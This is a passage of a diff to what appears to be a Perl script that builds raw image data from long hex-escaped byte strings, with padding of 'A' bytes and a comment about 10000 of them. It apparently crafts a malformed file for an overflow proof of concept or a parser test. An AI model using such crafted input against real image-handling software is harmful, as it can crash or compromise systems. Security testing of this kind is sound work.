+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x1B\xA7\x62\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xD5\xF5\x3C\x00".
+	        "\xE1\x00\x00\x00\x00\x00\x00\xE1\x00\xFB\x00\x00\x00\x00\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\x00".
+	        "\x3C\x00\xE3\x00\x00\x00\x00\x00\x00\xE3\x00\xFB\x00\x00\x00\x00\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5".
+	        "\xF5\xF5\x00\x00\x0A\x2D\xF4\xA6\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\xE4\xF4\x1E\x00\xFE\x00\x00\x00\x00\x00\x00\xFE\x00\xF3".
+	        "\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00\xF4\x00\x00\xF4\xF4\x00\x1E\x00\xFF\x00\x00\x00\x00\x00\x00\xFF".
+	        "\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00\xF4\x00\x00\xF4\xF4\xF4\x00\x00\x0C\x36\x53\xC4\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x99\x00\xBD\x00\x52\x00\x37\x55\x00\x8C\x00\x41\x00\x6E\xA0\x5E\x50\x54\xF0\x0A\x2D\xE7\x3F\x05\xE1".
+	        "\x44\x81\x4A\xF1\x98\x3F\x60\xCE\x2A\xC7\x64\x7B\xFF\x5C\x34\x12\x5A\xFC\xF1\x18\xFF\xED\x46\x2E\x75\xE6\x00\x60\x00\xAD\x00\xA5".
+	        "\x00\x2B\xB6\x00\x4F\x00\xB6\x00\xB8\x55\xAA\xA4\xA0\xF1\xB3\xDA\xE3\x55\x15\xAC\x5B\x97\x6F\x33\xF3\xCE\x9C\xCF\xDE\xC9\x90\x68".
+	        "\x46\x5D\x97\x05\x59\x0C\x75\xE7\x02\xEC\x1E\x29\x4C\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x32\x01\x22\x00".
+	        "\x20\x00\x00\x00\x00\x00\x00\x20\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x01\x00".
+	        "\x22\x00\x1C\x00\x00\x00\x00\x00\x00\x1C\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01".
+	        "\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x75\xFA".
+	        "\xE7\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xD7\xF5\x3C\x00\xCB\x00\x00\x00\x00\x00\x00\xCB\x00\xFB\x00\x00\x00\x00\xFB\x00".
+	        "\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\x00\x3C\x00\xE3\x00\x00\x00\x00\x00\x00\xE3\x00\xFB\x00\x00\x00\x00".
+	        "\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\xF5\x00\x00\x9F\x13\x34\xC5\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\xF5\xE5\xF4\x1E\x00\xEB\x00\x00\x00\x00\x00\x00\xEB\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00".
+	        "\xF4\x00\x00\xF4\xF4\x00\x1E\x00\xFF\x00\x00\x00\x00\x00\x00\xFF\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5".
+	        "\x00\x00\xF4\x00\x00\xF4\xF4\xF4\x00\x00\xEA\xE9\xD3\x86\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x00\xBD\x00\x52\x00\x37\x55\x00".
+	        "\x8C\x00\x41\x00\x6E\xA0\x5E\x50\x54\xF0\x0A\x2D\x9C\xB3\x47\x8B\xFE\xBC\xC9\x2A\x98\x3F\x60\xCE\x2A\xC7\x64\xE4\xFF\x9D\x34\x4C".
+	        "\x00\xFC\xDC\x18\x27\xED\x9F\x2E\x03\xE6\x00\x60\x00\xAD\x00\xA5\x00\x2B\xB6\x00\x4F\x00\xB6\x00\xB8\x55\xAA\xA4\xA0\xF1\xB3\xDA".
+	        "\xD8\xF8\xE4\x44\xF4\xD6\x0A\x37\xF3\xCE\x9C\xCF\xDE\xC9\x90\xDD\x46\x89\x97\x64\x29\x0C\x4D\xE7\xE7\xEC\xC6\x29\x39\x12\x00\xFF".
+	        "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x33\x01"."\x41" x 8;
+                #A x 10000
+my $img_data4 = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
